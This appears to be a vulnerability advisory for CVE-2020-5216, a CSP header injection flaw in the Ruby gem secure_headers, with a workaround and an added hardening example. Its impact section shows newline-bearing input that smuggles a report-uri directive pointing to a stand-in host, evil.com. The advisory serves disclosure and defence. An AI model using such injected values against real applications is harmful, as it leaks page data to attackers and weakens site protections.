CVE-2020-5216 – secure_headers
Package
Manager: gem
Name: secure_headers
Vulnerable Version: >=6.0.0 <6.3.0 || >=5.0.0 <5.2.0 || >=0 <3.9.0
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
EPSS: 0.00347 (percentile 0.56551)
Details
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers

### Impact

If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, Rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline. For example:

```ruby
override_content_security_policy_directives(script_src: ['mycdn.com', "\ninjected\n"])
```

would result in

```
Content-Security-Policy: ... script-src mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
```

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

```ruby
override_content_security_policy_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
```

```
Content-Security-Policy: ... script-src mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
```

### Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0.

### Workarounds

Strip newlines from user input before passing it to the override:

```ruby
override_content_security_policy_directives(frame_src: [user_input.gsub("\n", " ")])
```

### References

- https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
- [The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies)

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new)
* DM us at @ndm on twitter
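As an added example (not code from the secure_headers gem or Rails), the Ruby below models the directive serialisation and the newline splitting described above, then pairs the advisory's newline-stripping workaround with a stricter input check. The serialiser, `emit_headers`, `safe_source` and the `collector.example` host are constructed for illustration. In this model, stripping newlines alone still lets a value containing `;` add a directive to the same header, so the check also rejects separator characters.

```ruby
# Constructed model of CSP serialisation and of the Rails behaviour the
# advisory describes (one header per newline). Not the gem's own code.

HEADER = "Content-Security-Policy"

# Serialise {script_src: ["a", "b"]} into "script-src a b; ..." (simplified
# stand-in for the gem's serialiser).
def serialize_csp(directives)
  directives.map { |name, sources| "#{name.to_s.tr('_', '-')} #{sources.join(' ')}" }
            .join('; ')
end

# Every newline in the value starts a new header, so one logical
# Content-Security-Policy header becomes several.
def emit_headers(value)
  value.split("\n").map { |line| [HEADER, line] }
end

# Hardened check for a user-supplied source expression: strip CR/LF (the
# advisory's workaround, extended to carriage returns) and then refuse anything
# that could still act as a separator. Whitespace separates sources, ';'
# separates directives and ',' separates policies within one header.
def safe_source(input)
  cleaned = input.gsub(/[\r\n]/, ' ').strip
  unless cleaned.match?(/\A[^\s;,\x00-\x1f\x7f]+\z/)
    raise ArgumentError, "rejected CSP source: #{input.inspect}"
  end
  cleaned
end

def header_count(directives)
  emit_headers(serialize_csp(directives)).length
end

if __FILE__ == $0
  attacker = "\ninjected\n" # constructed input, mirroring the advisory's example
  vulnerable = { script_src: ["mycdn.com", attacker], img_src: ["'self'"] }
  hardened = { script_src: ["mycdn.com", safe_source(attacker)], img_src: ["'self'"] }
  puts "vulnerable: #{header_count(vulnerable)} headers" # 3
  puts "hardened:   #{header_count(hardened)} header"    # 1
  begin
    safe_source("\ndefault-src 'none'; report-uri collector.example")
  rescue ArgumentError => e
    puts e.message # rejected: would smuggle a directive even with newlines stripped
  end
end
```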
Metadata
Created: 2020-01-23T02:27:53Z
Modified: 2023-05-16T16:11:19Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json
CWE IDs: ["CWE-113"]
Alternative ID: GHSA-w978-rmpf-qmwg
Finding: F184
Auto approve: 1